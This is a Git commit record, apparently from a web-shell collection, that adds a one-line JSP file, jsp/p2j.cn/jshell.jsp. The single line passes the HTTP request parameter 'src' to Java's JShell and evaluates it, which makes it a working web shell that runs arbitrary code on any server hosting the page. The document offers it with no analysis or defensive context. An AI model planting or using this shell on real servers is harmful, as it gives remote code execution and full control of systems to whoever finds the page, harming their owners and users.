Create jshell.jsp

This commit is contained in:
tennc 2019-10-08 14:46:46 +08:00 committed by GitHub
parent c1112c2706
commit 294061690e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

1
jsp/p2j.cn/jshell.jsp Normal file
View file

@ -0,0 +1 @@
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src"))%>